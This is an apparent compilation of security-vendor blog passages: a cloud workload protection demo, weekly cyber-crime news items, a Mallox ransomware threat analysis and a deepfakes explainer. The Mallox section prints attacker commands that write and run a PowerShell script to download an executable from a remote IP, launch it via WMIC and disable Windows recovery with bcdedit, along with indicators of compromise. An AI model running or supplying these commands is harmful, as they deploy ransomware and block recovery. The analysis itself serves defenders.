Because the CWPP agent has the Behavioral AI Engine’s intelligence built-in, the AI makes this judgment autonomously. There is no round-trip latency to the cloud for processing or for human analysis. The AI identifies and stops the spread of machine-speed evil in real-time, at the edge. Process threads, or storylines, deemed suspicious or malicious may be remediated (e.g., process kill and file quarantine) according to policies which are owned and governed by the customer, and which are easily modified via the management console.

Every thread is preserved in the SentinelOne Singularity Data Lake according to the data retention period the customer has selected. Therein, the workload telemetry may be queried, inspected, and used for threat hunting and/or further analysis. The following example walks through a representative behavioral detection and subsequent analysis.

Example: Behavioral Detection of a Python Script

In this example, we have a Kubernetes cluster running in Amazon EKS (Elastic Kubernetes Service), with Singularity Cloud Workload Security for Kubernetes deployed for real-time cloud workload protection.

For illustration purposes, we will launch a shell script via command injection, which will in turn download a python script and initiate a sequence of events and trigger the Behavioral AI Engine.

Additionally, the CWPP response policies are set to Detect Mode for suspicious threats (ie, those which the engine detects with reasonable confidence), and Protect Mode for malicious threats (ie, those which the engine assesses with high confidence). Recall that the algorithms in our detection engines have been trained over the course of several years and hundreds of millions (nearly a billion) of malware samples.

Detection

In the following figure, we see that the Behavioral AI Engine was triggered by what it deemed to be a suspicious threat. The details captured include the path to the source process (ie, python), all the command line arguments, which points to a base64-encoded script, the process user, and the originating process, which is containerd.

Additional details include:

• information about the AWS EC2 instance running the k8s cluster (e.g., account ID, region, instance ID, network, tags, etc) on the CLOUD tab,
• info on the cluster itself (e.g., namespace, pod, and container image) on the KUBERNETES tab, and
• mapping of telemetry to MITRE TTPs on the THREAT INDICATORS pane.

All of this information can be used to accelerate an incident response investigation.

Analysis

By clicking on EXPLORE along the top of the management console, the security analyst can look at the process tree which Storyline has automatically assembled. The originating process, the containerd runtime, is shown in blue, indicating that the container runtime itself is not suspicious.

In itself, this is unsurprising, though it does indicate that the suspicious process is containerized. The Behavioral AI Engine first triggers a suspicious alert on the child bash process, which in turn spawns other child processes.

Note that the attack sequence is allowed to continue because the policy is set to Detect Mode. Each event in the sequence has process details recorded by the agent and shown in the right panel. It is worth noting that only an agent can deliver real-time threat detection and kernel process-level visibility, key for subsequent investigation, minimizing dwell time, and balancing risk management.

By simply following the visual sequence of events in the chain, each with its forensic details automatically recorded to the Singularity Data Lake by SentinelOne’s real-time CWPP, we quickly come to the python process itself. Here, the command line details shown in the right panel are much more telling. This is the malicious base64-encoded shell.

The security analyst now understands that a threat actor has accessed a specific k8s worker node (name, label, EC2 instance ID, region), installed a containerized web server, and, via command injection, downloaded a shell script which kicked-off a python script that launched base64-encoded web shell.

If arriving at that understanding seems like a lot of work, consider that CWPP and Storyline automatically assembled it all in an easy-to-follow sequence, compressing potentially hours of analysis into just a few minutes. And if those events seem like a lot of noise, consider that there is only a single alert per storyline, suppressing noise so that the analyst can focus on root cause analysis.

Remediation

Now that the attack is understood, the security analyst can initiate a 1-click remediation action in the management console, such as process kill – which stops all processes related to the threat sequence – and file quarantine, to encrypt the threat file and its executables. Recall, for this example, the customer policy was set to Detect Mode. Had the policy been set to Protect Mode, the CWPP solution would have initiated remediation actions (again, governed by policy) when the threat was detected.

The analyst can also open a JIRA or ServiceNow ticket, using the integrations available in Singularity Marketplace, conveniently accessed via the SentinelOne management console. Knowing that this incident impacted a containerized workload running on a managed Kubernetes service (ie, Amazon EKS), it is a good bet that this customer has a solution such as Synk Container to manage vulnerabilities in the workload source code.

By virtue of our CWPP integration with Synk, the runtime threat detection is automatically enriched with details from Snyk about known vulnerabilities it found in the source code. This information can be used to enrich the ticket and route to the appropriate DevOps owner, to investigate and resolve exploited vulnerabilities at the source.

Now that the suspicious threat has been mitigated, the analyst may wish to query the Singularity Data Lake to see what network activities are associated with this specific storyline. Doing so is as simple as a 1-click pivot on the “Storyline” field in the console, as shown here.

Such a query may reveal a pattern of communication back to specific IP addresses, which can then in turn, be hunted across the rest of the workload telemetry in the data lake, to understand what other activity, if any, the threat actor may have initiated.

Conclusion

If the Static AI Engine is the workhorse of our real-time CWPP solution, then the Behavioral AI Engine is the fusion reactor. By concurrently monitoring hundreds, even thousands, of concurrent kernel process threads, our Behavioral AI Engine is able to recognize when a sequence of related events exceed statistical norms.

In this way, the Behavioral AI Engine detects even the most sophisticated or as yet unknown threats in real time and records extensive attack details so that incident response is streamlined and an in-depth understanding achieved.

To learn more about the value of real-time CWPP in your cloud security stack, head over to the solution homepage, or see how Singularity Cloud Workload Security works with a 2-minute guided walk-through here. And of course, whenever you are ready, you may connect with one of our cloud security experts for a personalized demo.

Online financial crime resulted in losses of $3 billion last year, with cryptocurrency investment fraud rising by 183%, according to statistics released by the FBI. Good to hear, then, that the Department of Justice has this week arrested two individuals and charged another four over a cryptocurrency investment scam that allegedly netted the gang over $80 million.

The indictment accuses Lu Zhang, Justin Walker, Joseph Wong, and Hailong Zhu of operating a complex network of shell companies and bank accounts. These were allegedly used to launder money from victims lured into ‘pig butchering’ scams. The criminals built trust with their victims through messaging apps, dating platforms, and social media, before deceitfully draining their cryptocurrency wallets.

Naperville, Illinois & California:
Justin Walker, Lu Zhang, Alhambra, California, Joseph Wong, Hailong Zhu https://t.co/WrnYV5lq4k

— Jane Heathley (@ladydigging) December 14, 2023

Two of the suspects, Zhang and Walker, appeared in a federal court in Los Angeles to face charges including conspiracy to commit money laundering, with potential sentences of up to 20 years if convicted.

According to the Justice Department, the gang’s activities involved at least 284 transactions and resulted in more than $80 million in victim losses. More than $20 million in stolen funds was directly deposited into bank accounts associated with the suspects.

The law enforcement action underscores the growing threat of online investment scams, particularly those involving cryptocurrencies, and highlights the need for vigilance in the ongoing battle against digital financial crimes.

The Bad | Microsoft Accounts Targeted Through Misuse of OAuth Applications

Threat actors are increasingly targeting Microsoft accounts by exploiting OAuth applications for a range of malicious activities, including BEC (Business Email Compromise), phishing, spamming, and cryptocurrency mining, researchers said this week. An investigation uncovered approximately 17,000 malicious multi-tenant OAuth applications created using compromised Microsoft accounts, leading to over 927,000 phishing emails in a campaign running from July to November 2023

Attackers Target Microsoft Accounts to Weaponize OAuth Apps https://t.co/ZeAkoHCMVw

— Nicolas Krassas (@Dinosn) December 13, 2023

Attackers are focusing on Microsoft user accounts with weak authentication, such as those lacking multi-factor authentication (MFA), and employing phishing or password-spraying tactics to gain control. Once access is secured, they create new OAuth applications with high privileges, enabling them to stay under the radar while maintaining persistent access.

In one case, APT actor Storm-1283 used OAuth attacks to deploy virtual machines for cryptocurrency mining, causing financial losses to multiple organizations from $10,000 to $1.5 million.

In another, an attacker exploited OAuth applications for phishing campaigns and BEC reconnaissance, using Microsoft’s Outlook Web Application (OWA) to search for “payment” and “invoice” related information through compromised accounts.

Across several instances, attackers were found to have created multi-tenant OAuth apps for persistence, creating new credentials, and sending phishing emails via the Microsoft Graph API.

Admins are urged to ensure that MFA is required on all accounts and to enforce conditional access policies wherever possible. Accounts should be monitored for unusual or risky behavior and revoked if found to be suspicious.

The Ugly | Ukraine Mobile Network Hit As Russian Tax Service Attacked By Malware

Ukraine’s largest mobile network operator, Kyivstar, suffered a massive cyberattack earlier this week, leaving more than half of the nation’s population without crucial mobile and internet services. The attack disrupted IT infrastructure as well as air raid alert systems across several regions.

Kyivstar’s official website went offline, but the company said on social media that it had been targeted by “a powerful hacker attack”, which it attributed as a direct consequence of the Russian war on Ukraine. Kyivstar CEO Oleksandr Komarov was reported as saying that the attack had significantly damaged the company’s infrastructure, adding that “we could not counter it at the virtual level, so we shut down Kyivstar physically to limit the enemy’s access.”

In the wake of the disruption, it is being suggested that while major services like mobile internet, voice services, and SMS should be restored soon, a full recovery of all services could take several weeks.

Initially, Russian hacktivist group Killnet made unsubstantiated claims to be behind the attack. By Wednesday, another group called Solntsepyok, believed to be linked to Russian military intelligence APT Sandworm, posted screenshots on Telegram purporting to show how it accessed Kyivstar’s servers, stating that “We attacked Kyivstar because the company provides communications to the Ukrainian Armed Forces, as well as state bodies and Ukraine’s security forces”.

In a worrying sign of how civilian critical infrastructure is increasingly a target in cyber warfare, Ukraine announced on the same day as the Kyivstar attack that its defense intelligence directorate (GUR) had infected thousands of Russian servers used by Russia’s state tax service, destroying databases and backups. The statement said the attack had led to the complete destruction of Russia’s federal tax service (FNS) infrastructure.

In this post, we highlight recent Mallox activity, explain the group’s initial access methods and provide a high-level analysis of recent Mallox payloads to help defenders better understand and defend against this persistent threat.

Mallox Ransomware Overview

Operating under a Ransomware-as-a-Service (RaaS) model, Mallox leverages well-known underground forums and markets such as Nulled and RAMP to advertise its service and recruit affiliates. The group maintains a TOR-based leaks site where it regularly makes announcements about recently compromised organizations and exposes stolen data. Mallox also maintains a presence on Twitter/X for similar purposes.

Initial Access | Focus on MS-SQL & Brute Force Attacks

Mallox primarily gains initial access through the exploitation of vulnerable and publicly exposed services, with a particular focus on MS-SQL (Microsoft SQL Server) and ODBC (Open Database Connectivity) interfaces. Specific vulnerabilities are targeted, including unpatched instances of old remote code execution (RCE) vulnerabilities like CVE-2019-1068 in Microsoft SQL Server and CVE-2020-0618 in Microsoft SQL Server Reporting Services.

In addition, the group makes successful use of brute force attacks against weakly configured services and applications open to the public internet. In recent campaigns Mallox actors gained initial access through dictionary-based brute-force attacks against weak MS-SQL interfaces. However, other vectors are known to be used by Mallox affiliates, including phishing emails to deliver attack frameworks such as Cobalt Strike and Sliver.

Post-Compromise Attack Behavior

After gaining initial access, Mallox threat actors typically execute PowerShell commands to run various batch scripts and download the ransomware payload.

Scripts such as Kill-Delete.bat or Bwmeldokiller.bat are used to terminate or remove running processes that may interfere with or prevent the ransomware’s encryption routine.

Commands are executed to download and launch the ransomware payloads. The following provides a typical example:

/C echo $cl = New-Object System.Net.WebClient >%TEMP%\updt.ps1 & 
echo $cl.DownloadFile("hXXp://80[.]66.75]]]].40/XXXXXXXXX.exe", "%TEMP%\xxxx.exe") >> %TEMP%\updt.ps1 & 
powershell -ExecutionPolicy Bypass %TEMP%\updt.ps1 & 
WMIC process call create "%TEMP%\XXXXXXXX.exe"

The command sequence first crafts a PowerShell script in the system’s temporary directory, leveraging the WebClient class to download an executable from a remote server. The updt.ps1 PowerShell script is executed with bypass execution policy restrictions, ensuring an unrestricted run. The script then employs Windows Management Instrumentation (WMIC) to execute the ransomware payload.

Recent Payloads | Mallox.Resurrection

Mallox variants from 2021 to today display a highly consistent set of core functionalities, indicating that threat actors continue to achieve success with a tried and tested formula. Recent payloads are labeled “Mallox.Resurrection”, reflecting a change in the ransom notes deposited after encryption.
Hard-coded exclusions exempt a number of file types and processes from encryption. File types are excluded through named extensions:

.386 .adv .ani .avast .bat .bin .cab .cmd .com .cpl .cur 
.deskthemepack .diagcfg .diagpkg .diangcab .dll .drv .exe 
.Globeimposter-Alpha865qqz .hlp .hta .icl .icns .ico .ics .idx 
.key .lnk .lock .mallox .mallox .mod .mpa .msc .msi .msp .msstyles 
.msu .nls .nomedia .ocx .prf .ps1 .rom .rtp .scr .shs .spl .sys .theme .themepack .wpx 

Processes are excluded or ignored based on the existence of certain strings in the path name (e.g., “Windows Defender” ).

"$windows ~bt"                  "Package Store"
"$windows ~ws"                  "Package"
"appdata"                       "perflogs"
"application data"              "programdata"
"Assemblies"                    "Reference"
"boot"                          "Store"
"boot"                          "system volume information"
"Common Files"                  "tor browser"
"Core Runtime"                  "Windows
"google"                        "Windows Defender"
"intel"                         "Windows Kits"
"Internet Explorer"             "Windows Mail"
"Microsoft Analysis Services"   "Windows Microsoft NET"
"Microsoft ASP NET"             "Windows NT"
"Microsoft Help Viewer"         "Windows Photo Viewer"
"Microsoft MPI"                 "Windows Portable Devices"
"Microsoft Security Client"     "windows old"
"Microsoft Security Client"     "Windows"
"Microsoft NET"                 "WindowsPowerShell"
"mozilla"

Upon launch, the ransomware spawns the following commands:

bcdedit.exe  /set {current} bootstatuspolicy ignoreallfailures
bcdedit.exe  /set {current} recoveryenabled no

These serve to alter the Boot Configuration Data (BCD) settings, affecting the OS’s ability to recover from failure and preventing administrators from restoring the system with Windows built-in tools.

Encrypted files are appended with the .mallox extension, and a ransom note with the file name “HOW TO BACK FILES.TXT” is written to each folder containing locked files. The ransom note contains instructions on how to obtain a decryption tool using TOR and contains a TargetID, a unique identifier for the victim. Beginning in mid 2023, we observed that the contact email in the Mallox ransom notes changed from “mallox@onionmail” to “mallox.resurrection@onionmail.org”

In addition to the ransom notes, a file called “Targetinfo.txt” is written to the user’s Desktop. This file also contains the TargetID along with basic details of the host’s environment (OS version, architecture, hostname, etc.)

Victims who do not respond to the ransom demand are threatened with exposure of their data on the group’s data leak site.

Conclusion

Despite previously suffering setbacks such as the release of a public decryptor for earlier versions of its payloads, Mallox has maintained a steady stream of compromises and iterated on successful versions of its ransomware. The continued abuse of unpatched MS-SQL interfaces and brute-forcing of weak passwords suggests the group sees little need to alter its MO while organizations leave such a fruitful avenue open to exploitation.

The group’s longevity provides a sharp reminder that cybersecurity basics will go a long way to keeping such threats at bay. Reviewing and hardening applications and services exposed to the public internet is strongly recommended, along with deployment of appropriate endpoint and cloud security solutions like SentinelOne.

All SentinelOne customers are protected from Mallox ransomware.

To learn about how SentinelOne can help protect the devices in your fleet from ransomware and other threats, contact us or request a free demo.

Indicators of Compromise

3d434b7cc9589c43d986bf0e1cadb956391b5f9a  updt.ps1
9295a02c49aa50475aa7876ca80b3081a361ff7d  updt.ps1

3fa79012dfdac626a19017ed6974316df13bc6ff  Bwmeldokiller.bat
7e7957d7e7fd7c27b9fb903a0828b09cbb44c196  Kill-Delete.bat

Mallox Ransomware Payloads
08a236455490d5246a880821ba33108c4ef00047
0d2711c5f8eb84bd9915a4191999afd46abca67a
0e45e8a5b25c756f743445f0317c6352d3c8040a
11d7779e77531eb27831e65c32798405746ccea1
246e7f798c3bfba81639384a58fa94174a08be80
273e40d0925af9ad6ca6d1c6a9d8e669a3bdc376
2a6f632ab771e7da8c551111e2df786979fd895d
2c49fa21b0a8415994412fe30e023907f8a7b46e
33c24486f41c3948fbd761e6f55210807af59a1f
4c863df8ea7446cb7fba6e582959bc3097f92b5c
4fcfb65cb757c83ed91bc01b3f663072a52da54b
5229a5d56836c3d3fc7fb12a43a431b5c90f771d
552862af77b204ac1f69b9e25937cc60e30e6c0f
5d0b9521cca0c911d49162e7f416a1463fbaefae
5d9cc0bc652b1d21858d2e4ddd35303cd9aeb2a3
63408c84c5d642cf1c5b643a97b84e22e18323c0
643918830b87691422d6d7bd669c408679411303
65d7cb5f1770b77b047baf376bd6b4cf86c5d42c
88eef50d85157f2e0552aab07cac7e7ec21680f5
88f8629423efe84e2935eb71d292e194be951a16
9d182e17f88e26cb0928e8d07d6544c2d17e99f5
a8886c9417b648944d2afd6b6c4941588d670e3c
db3fd39fc826e87fa70840e86d5c12eef0fe0566
ee15c76e07051c10059a14e03d18a6358966e290
fb05a6fafc28194d011a909d946b3efa64cdb4cf

Mallox DLS (Data Leak Site)
http[:]//wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad[.]onion/

Mallox Distro / C2 IP Addresses
104[.]21.76.77
104[.]237.62.211
172[.]67.191.103
64[.]185.227.155
80[.]66.75.37

Sophisticated, AI-powered synthetic media has evolved from a novel concept in Hollywood to a practical tool used daily by politically-motivated threat actors and cybercriminals for misinformation and fraud.

Since we last wrote about deepfakes a lot has changed. There are new powerful actors, with both old and new grievances, and of course, an explosion in the availability and capabilities of AI. Our trust in the veracity of what we see online has never been lower, nor more fragile.

In this post, we delve into the world of deepfakes as we see it today, exploring the nature, risks, real-life impacts, and measures needed to counter these advanced threats.

What Are Deepfakes?

Deepfakes are artificially-created media, typically video and audio, that purport to show events or people engaging in behaviors that never in fact occurred. They leverage sophisticated artificial intelligence (AI) and machine learning technologies, in particular generative adversarial networks (GANs).

GANs involve two AI models: one that generates content (the generator) and another that evaluates its authenticity (the discriminator). The generator creates increasingly realistic fake videos or audio, while the discriminator continuously assesses the content’s verisimilitude, leading to a rapid improvement in the quality and believability of the generated fakes.

Originally, deepfakes found their place in entertainment and social media, providing novel ways to create content, like superimposing celebrities’ faces onto different bodies in videos or enabling realistic voice impersonations. However, this technology’s potential for creating highly convincing forgeries soon transitioned from mere novelty to a potent tool for misinformation and manipulation.

AI voice cloning is being used to scam people by impersonating active service members to try and extort money or personal information from their families. This is unacceptable and why Senator Collins and I called on the FCC and FTC to address the rise in AI voice cloning scams.

— Amy Klobuchar (@amyklobuchar) November 8, 2023

The Cybersecurity Risks of Deepfakes | A Broad Spectrum

From political disinformation to financial deception, the ramifications of deepfakes are far-reaching and multifaceted. Let’s explore some key examples to understand the breadth and depth of these risks.

Political Disinformation

Deepfakes pose a significant risk to political stability by spreading false narratives and manipulating public opinion, particularly when they are used to create misleading representations of political figures. The first notable example occurred in 2018, when BuzzFeed released a deepfake of President Obama.

Since then, many others have come to light; a deepfake video of Ukrainian President Volodymyr Zelensky falsely portrayed him as conceding defeat and urging Ukrainians to surrender to Russia. Aimed at misleading and demoralizing the public, the video was identified as fake due to discrepancies such as the mismatched size of Zelensky’s head to his body.

Corporate Espionage

In the corporate world, deepfakes have emerged as tools for fraud and deception with the potential to cause substantial financial losses. Such scams can be particularly effective when impersonating high-level executives. A UK-based energy firm lost €220,000 after AI software was used to imitate the voice of the CEO of the firm’s German parent company and instruct the UK CEO to urgently transfer funds.

Personal Identity Theft and Harassment

Personal rights and privacy are, of course, highly susceptible to harm from fake media when it is used to commit identity theft and harassment. Malicious media creations can be alarmingly realistic. In Germany, the government was so concerned about the threat of deepfakes that it released an ad campaign to highlight the dangers, warning parents about the risks associated with these technologies.

Financial Market Manipulation

Beyond harm to individual persons or organizations, deepfakes can disrupt entire financial markets by swaying investor decisions and market sentiments with false narratives. An illustrative case was the deepfake video depicting a supposed explosion near the Pentagon, which briefly impacted the US stock markets.

Legal and Judicial Misuse

In the legal domain, deepfakes can be used to fabricate evidence, potentially leading to miscarriages of justice and undermining the integrity of judicial processes. Although a specific widespread instance in legal settings is yet to occur, the potential for deepfakes to be used in this manner raises concerns about the reliability of video and audio evidence in courtrooms and the need for enhanced verification measures to ensure judicial integrity.

Detecting and Combating Deepfakes | On the Cybersecurity Frontline

As with any tool, AI can be used for both good and bad, and there are efforts underway to develop AI-driven methods to detect and combat the threat of deepfakes. Many of these efforts focus on analyzing facial expressions and voice biometrics to spot subtle anomalies that are undetectable to the human eye and ear. This involves using machine learning models and training them on extensive datasets containing both genuine and manipulated media in order to effectively distinguish between the two.

Blockchain technology, more typically associated with cryptocurrencies, is also emerging as a useful tool in this fight. Blockchain provides a way to verify the source and authenticity of media files and confirm whether they have been altered. So-called “smart contracts” can be used both to verify the authenticity of digital content and to trace how it is interacted with, including any modifications. Combined with AI that can flag media content as potentially inauthentic, a smart contract can trigger a review process or alert relevant authorities or stakeholders.

Other tools are being developed to ensure that content created by AI platforms can be detected as artificial. For example, Google’s SynthID can embed inaudible “watermarks” in AI-generated audio content. Methods like SynthID are intended to ensure that content generated by AI tools remains reliably detected as artificially generated even after it has been manipulated by humans or other editing software.

As in other areas of cybersecurity, education and awareness campaigns have an important part to play in combating the threat of deepfakes. Educating individuals and organizations about deepfakes, how to spot them, and their potential impact will be essential. Collaborations between technology companies, cybersecurity experts, government agencies, and educational institutions will prove to be vital over the next few years as we strive to develop more comprehensive strategies to combat artificially-generated content used for ill ends.

Best Practices for Organizations and Individuals in the Era of Deepfakes

As the threat landscape shaped by deepfakes continues to evolve, it is increasingly important to adopt strategies to mitigate risks associated with the misuse of AI technology. Here is our guide to current best practices and measures to enhance resilience against deepfake-related security threats.

Raising Awareness and Training

Education is the cornerstone of defense against deepfakes. Conducting regular training sessions for employees to recognize deepfakes can significantly lower the risk of deception. This training should focus on the subtleties of synthetic media and keep abreast of the latest developments in deepfake technology.

Cultivating a verification culture within organizations, where any unusual or suspicious communication, particularly involving sensitive information, is cross-verified through multiple channels, is also crucial.

Implementing Robust Verification Processes

For critical communications, especially in financial and legal contexts, implementing multi-factor authentication and rigorous verification processes is indispensable. For instance, voice and video call confirmations for high-stake transactions or sensitive information sharing can be effective. Such practices can prevent incidents similar to the aforementioned case in which a CEO’s voice was faked for fraudulent activities.

Utilizing Advanced Cybersecurity Solutions

We can leverage AI to defeat AI by incorporating advanced cybersecurity solutions with deepfake detection capabilities. Tools employing AI and machine learning to analyze and flag potential deepfakes add an important layer of security.

Regular Software and Security Updates

Maintaining up-to-date software, including security solutions, is vital for cybersecurity. Updates often contain patches for newly identified vulnerabilities that could be exploited by deepfakes and other cyber threats. A proactive stance on software updates can significantly reduce the likelihood of security breaches.

Collaborating with External Experts

For organizations, particularly those with limited in-house cybersecurity capabilities, partnering with external security experts can offer enhanced protection. These professionals can provide insights into the latest threats and assist in crafting strategies specifically designed to counter deepfakes and other emerging cyber risks.

Personal Vigilance

As individuals, it is important for all of us to maintain vigilance when engaging with media. This includes maintaining a healthy skepticism towards sensational or controversial content and verifying sources before sharing or acting on such information.

Utilizing tools and browser extensions that assist in detecting deepfakes can also contribute to stronger personal cybersecurity practices.

It’s also worth remembering that, like any other creation, deepfakes come with varying degrees of quality and attention to detail from the creator. That means in some cases it is still possible to spot less-advanced or sophisticated deepfakes. Some things to watch out for include:

• Unnatural Eye Movements: AI-generated images or videos can fail to accurately replicate intricate and natural eye movements. This discrepancy can manifest as unusual blinking patterns or a lack of natural eye movement.
• Audio-Video Sync Issues: Some deepfakes can fail to sync spoken words and lip movements, leading to noticeable discrepancies.
• Color and Shadow Inconsistencies: AI often struggles with consistently rendering colors and shadows, especially in varying lighting conditions. Look out for inconsistencies in skin tones or background colors. Shadows might appear misplaced or of the wrong intensity.
• Unusual Body Movements: AI might also struggle to maintain the consistency of body shapes, leading to noticeable distortions or irregularities. This might include jerky, unnatural movements or expressions that don’t align with how a person typically moves or reacts.

In short, combating deepfakes requires a multi-faceted approach, combining education, robust verification processes, advanced technology, software maintenance, expert collaboration, and personal vigilance. These practices form an integral part of a comprehensive strategy to counter the growing sophistication of deepfakes in the cybersecurity landscape. As a bonus, they will also help protect against other kinds of cybersecurity threats and serve to encourage the security mindset individuals and organizations need in today’s digital-centric world.

The Future of Deepfakes and Cybersecurity

The deepfake genie is out of the bottle and we cannot wish it away. Rather, as deepfakes become increasingly prevalent and ever-more subtle, we will need to evolve effective responses. This will entail development in certain key areas.

Aside from continued development of advanced authentication tools, industry leaders, including AI developers like OpenAI and cybersecurity firms, will need to steer the development and application of AI technologies to both establish ethical guidelines and ensure robust defense mechanisms against deepfake threats.

New legislation and regulations will also be required to prohibit and penalize the creation and dissemination of deepfakes for harmful purposes. Due to the transnational nature of digital media, international collaboration in legal frameworks will also be needed to effectively combat deepfakes.

As we’ve noted above, educating the public about deepfakes and enhancing media literacy are an integral part of countering the threat of manipulated media. Technology and regulation alone cannot win the fight across the broad spectrum of online surfaces in which misinformation can be disseminated.

The inevitable proliferation of deepfakes demands a multi-dimensional approach, combining technological innovations, ethical industry practices, informed legislative measures, and public education. We are only at the mercy of technology when we fail to take the time to understand its implications or develop the appropriate controls. When it comes to AI and deepfakes, we still have meaningful opportunities to do both.

Anatoly Legkodymov (aka “Gandalf” or “Tolik”), co-founder of the Bitzlato cryptocurrency exchange, has pleaded guilty to his role in aiding ransomware gangs and other cybercriminals in laundering over $700 million. Legkodymov has agreed to disband Bitzlato and forfeit his claim to approximately $23 million in seized assets, according to the terms of his plea agreement.

Bitzlato reportedly saw widespread illicit activity on its platform. The exchange promoted a user registration process with minimal identification requirements, explicitly stating that neither selfies nor passports were necessary. According to the DoJ, this lax approach led to Bitzlato becoming a haven for criminal proceeds and funds intended for a variety of malicious activities.

Reports on cryptocurrency-related illicit activity revealed that Bitzlato conducted over $2 billion in cryptocurrency transactions between 2019 to 2021 alone. Nearly 48% of this amount, approximately $966 million, was associated with high-risk cryptocurrency transactions and deemed illicit. The exchange received funds totaling $206 million from darknet markets, $224.5 million from scams, and $9 million from ransomware attackers.

The crypto exchange was also known to be particularly entwined with the Hydra Market, facilitating more than $700 million worth of cryptocurrency exchanges until the dark market was shut down by U.S. and German law enforcement in April 2022. The exchange also received millions in ransomware proceeds, despite repeated warnings to Legkodymov that the routed cryptocurrency represented the proceeds of crime and was intended for illicit transactions.

Dismantling Bitzlato’s digital infrastructure and the subsequent seizure of its domains was a collaborative effort from Europol and authorities in France, Spain, Portugal, and Cyprus. After his initial arrest in Miami earlier this year, Legkodymov now faces a maximum sentence of five years in prison for his role in the illicit activities associated with Bitzlato.

The Bad | APT28 Actors Re-Use Old Outlook Vulnerability to Access Polish Exchange Accounts

Security researchers have identified the Russian state-sponsored actor, APT28 (aka Fancy Bear or Sofacy), exploiting a recently-patched flaw (CVE-2023-23397) in Microsoft Outlook to gain unauthorized access to accounts within Exchange servers. Before it was fixed in March, targets spanned critical sectors in the United States, Europe, and the Middle East. Based on the new wave of attacks, Polish Cyber Command’s (DKWOC) reports that the attacker’s goal now is to obtain unauthorized access to mailboxes belonging to public and private entities that have yet to patch their instances.

CVE-2023-23397 is a critical-level (CVSS score: 9.8) elevation of privilege (EoP) vulnerability triggered by a specially-crafted email message that is sent to a targeted user. Once the message is opened, the user’s Net-NTLMv2 hash is transmitted to the attacker, allowing them to manipulate the access permissions of specific mailboxes and steal sensitive information and/or credentials.

The state-sponsored group linked to APT28 has been active since 2008, known most widely for interfering in the 2016 U.S. presidential election and their engagement in various hack-and-leak operations. Their victims are typically high-value, coming from governments, military, and private sectors. Just two months ago, the National Cybersecurity Agency of France (ANSSI) pinned a cluster of attacks on agencies, universities, think tanks, and research institutions onto the threat group, where they leveraged a combination of flaws, including CVE-2023-23397, to deploy stealers in prominent web browsers.

APT28 commonly employs other known vulnerabilities as part of their attack methods, such as CVE-2023-38831 or CVE-2021-40444. The recent incidents underscore the persistent challenges posed by sophisticated state-sponsored threat actors and the importance of promptly applying security patches to mitigate the risk of exploitation.

The Ugly | Unidentified Actors Exploit Adobe ColdFusion Flaw to Breach U.S. Government Servers

Threat actors are actively exploiting a high-severity vulnerability found in Adobe’s ColdFusion to gain initial access into U.S. government servers. According to CISA’s latest warning on the mounting attacks, the flaw tracked as CVE-2023-26360 presents an improper access control issue that could lead to arbitrary code execution.

The advisory highlights two incidents of exploitation where CVE-2023-26360 was utilized to compromise federal agency systems. Both instances involved outdated server software vulnerable to various CVEs, with threat actors leveraging the vulnerability to deploy malware through HTTP POST commands to the ColdFusion-associated directory path.

During the first incident, attackers breached a server running Adobe ColdFusion v2016.0.0.3. They performed process enumeration, network checks, and installed a web shell for code injection into a ColdFusion configuration file to extract credentials. The attackers then followed with tactics such as file deletion and creation in specific directories to conceal their activities.

The second incident involved attackers exploiting the flaw on a server running Adobe ColdFusion v2021.0.0.2. After gathering user account information, they deployed a remote access trojan in the form of a text file. Attempts were made to exfiltrate Registry files and security account manager (SAM) information, utilizing security tools to access a directory on domain controllers. Fortunately, both attacks were detected and thwarted before any data exfiltration or lateral movement occurred, with compromised assets removed from critical networks within 24 hours.

CISA categorizes these incidents as reconnaissance efforts, although it remains uncertain whether the same threat actor is responsible for both intrusions. To mitigate risks, CISA recommends updating ColdFusion to the latest version, implementing network segmentation, configuring firewalls or web application firewalls (WAFs), and enforcing policies for signed software execution.